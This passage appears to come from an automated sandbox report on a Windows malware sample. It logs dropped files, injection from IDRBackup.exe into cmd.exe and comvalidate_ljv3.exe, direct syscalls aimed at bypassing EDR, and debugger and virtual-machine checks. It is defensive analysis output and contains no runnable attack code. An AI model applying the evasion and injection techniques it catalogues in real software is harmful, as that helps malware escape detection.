                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\maddisAsm_.bplJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\madexcept_.bplJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\rtl120.bplJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\vcl120.bplJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeFile created: C:\Users\user\AppData\Roaming\toolsync_RO\vclx120.bplJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\wqosufscJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\ikltbdkyJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00000001400853D4 GetPrivateProfileStringW,lstrlenW,10_2_00000001400853D4

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Found hidden mapped module (file has been removed from disk)
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WQOSUFSC
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\IKLTBDKY
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeAPI/Special instruction interceptor: Address: 6C547C44
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeAPI/Special instruction interceptor: Address: 6C547C44
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeAPI/Special instruction interceptor: Address: 6C547945
                      Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6C543B54
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ikltbdkyJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wqosufscJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeAPI coverage: 7.5 %
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeAPI coverage: 1.0 %
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe TID: 7604Thread sleep time: -90000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5001C0CC @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec,@System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,@Sysutils@FindClose$qqrr19Sysutils@TSearchRec,GetLastError,2_2_5001C0CC
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5000C390 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,2_2_5000C390
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5001BB34 FindFirstFileW,FindClose,@System@Move$qqrpxvpvi,2_2_5001BB34
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_5001BD10 @System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,FindClose,2_2_5001BD10
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000A5E0 GetDlgItem,SendMessageW,SendMessageW,SendMessageW,wsprintfW,GetClientRect,SendMessageW,FindFirstFileW,lstrlenW,SendMessageW,FindNextFileW,FindClose,10_2_000000014000A5E0
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140007628 FindClose,lstrlenW,lstrcpyW,FindFirstFileW,GetFullPathNameW,FindClose,SetLastError,lstrlenW,10_2_0000000140007628
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000D848 GetLogicalDriveStringsW,GetDlgItem,GetDriveTypeW,_cwprintf_s_l,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SHGetSpecialFolderPathW,lstrlenW,SHGetSpecialFolderPathW,lstrlenW,SendMessageW,SendMessageW,GetDlgItem,SendMessageW,SendMessageW,GetDlgItem,SendMessageW,RegOpenKeyExW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,SendMessageW,SendMessageW,SendMessageW,RegCloseKey,10_2_000000014000D848
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                      Source: comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                      Source: comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                      Source: comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                      Source: comvalidate_ljv3.exe, 0000000A.00000003.2430835895.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2464101114.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2528549271.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2597643516.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2488660096.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2569610517.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2488817743.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2618755936.000000000042C000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2548380575.00000000004AB000.00000004.00000020.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000003.2618354577.00000000004AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                      Source: comvalidate_ljv3.exe, 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeCode function: 3_2_6C482C08 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C482C08
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeCode function: 3_2_6C488B27 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,3_2_6C488B27
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe "C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeCode function: 3_2_6C482C08 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C482C08
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeCode function: 3_2_6C483119 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C483119
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeCode function: 3_2_6C487F2A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,3_2_6C487F2A
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_00007FF6C43311B5 Sleep,exit,SetUnhandledExceptionFilter,exit,10_2_00007FF6C43311B5

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF617CF0BA6Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF617B532A3Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryValueKey: Direct from: 0x14011D93EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C43F0CF7Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C45784CFJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtClose: Direct from: 0x14011D864
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF6C4477D9BJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF6C43DE8F1Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C447E686Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FFE221E4B5EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryValueKey: Direct from: 0x7FF6C440D211Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtClose: Indirect: 0x14012000F
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryInformationProcess: Direct from: 0x7FF6C43F246BJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtCreateFile: Direct from: 0x7FF6C43E3589Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtClose: Direct from: 0x7FF6C44482EE
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF6C450F1BFJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtCreateFile: Direct from: 0x7FF6C456FB08Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C44493F6Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FFE221C26A1Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeNtSetInformationThread: Direct from: 0x6C482AD0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF617AB5626Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtReadFile: Direct from: 0x7FF6C43EC0E1Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtEnumerateValueKey: Direct from: 0x7FF6C44BDC03Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF6C43E3283Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryInformationToken: Direct from: 0x7FF6C4409A61Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryValueKey: Direct from: 0x7FF6C440CF1BJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C4335626Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtClose: Direct from: 0x7FF6C4572249
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF617AB96FDJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C43396FDJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C4444A3AJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtCreateThreadEx: Direct from: 0x7FF617AB5790Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C45107BFJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryValueKey: Direct from: 0x7FF6C440D688Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtSetInformationProcess: Direct from: 0x7FF6C43F302BJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF6C44459A7Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C43EC084Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C4486A36Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtClose: Direct from: 0x7FF6C457223B
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x14011D808Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF617CFA11EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C43DED9DJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF617CFA1F6Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C4570BA6Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF617BF7D9BJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C4517FF9Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryValueKey: Direct from: 0x7FF6C440D427Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtRequestWaitReplyPort: Direct from: 0x7FF6C447E982Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF6C43E57A7Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtOpenKeyEx: Direct from: 0x7FF6C440CB50Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtReadVirtualMemory: Direct from: 0x7FF6C456CDE2Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtCreateThreadEx: Direct from: 0x7FF6C4335790Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C43DB4E0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtReadFile: Direct from: 0x14011D832Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C457A1F6Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryInformationToken: Direct from: 0x7FF6C4482BBEJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C43D32A3Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtProtectVirtualMemory: Direct from: 0x7FF6C457A11EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryInformationToken: Direct from: 0x7FF6C44424A0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C43E336BJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeNtSetInformationThread: Direct from: 0x6E542AD0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQueryInformationProcess: Direct from: 0x7FF6C43F2050Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF617CF0FD4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C4570FD4Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeNtSetInformationThread: Direct from: 0x6F912AD0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtCreateFile: Direct from: 0x14011D7A4Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeNtQuerySystemInformation: Direct from: 0x76EF63E1Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtClose: Direct from: 0x7FF6C4572227
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtQuerySystemInformation: Direct from: 0x7FF6C447EBD0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtCreateFile: Direct from: 0x7FF6C456CFC5Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C4510425Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtSetInformationProcess: Direct from: 0x7FF6C43F1F69Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x140120A3CJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6C43E3A30Jump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe protection: read writeJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe base: 14011BC08Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe base: 37C010Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe base: 14011BC08Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe base: 2BD010Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000BFFC CharLowerW,lstrcmpiW,lstrcmpiW,lstrlenW,lstrlenW,lstrcmpiW,lstrcmpW,lstrlenW,GetActiveWindow,GetTempPathW,lstrlenW,GetModuleFileNameW,CopyFileW,MessageBoxW,lstrlenW,ShellExecuteW,GetModuleFileNameW,CharLowerW,lstrlenW,10_2_000000014000BFFC
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeJump to behavior
                      Source: IDRBackup.exe, 00000002.00000002.1802356275.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, comvalidate_ljv3.exe, 0000000A.00000002.2631090799.0000000140156000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: @System@LoadResourceModule$qqrpbo,GetModuleFileNameW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,lstrcpynW,GetThreadLocale,GetLocaleInfoW,lstrlenW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,lstrcpynW,LoadLibraryExW,2_2_5000C58C
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: @Sysutils@GetLocaleStr$qqriix20System@UnicodeString,GetLocaleInfoW,@System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi,@System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString,2_2_50025B78
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: @Sysutils@GetLocaleChar$qqriib,GetLocaleInfoW,2_2_50025BC4
                      Source: C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exeCode function: GetLocaleInfoA,3_2_6C48986C
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exeCode function: 2_2_50022830 @Sysutils@CurrentYear$qqrv,GetLocalTime,2_2_50022830
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_000000014000EE50 GetDlgItem,GetUserNameW,wsprintfW,GetDlgItem,SetWindowTextW,GetDlgItem,SetWindowTextW,10_2_000000014000EE50
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140026184 GetTimeZoneInformation,10_2_0000000140026184
                      Source: C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exeCode function: 10_2_0000000140026080 GetVersionExW,GetVersionExW,10_2_0000000140026080
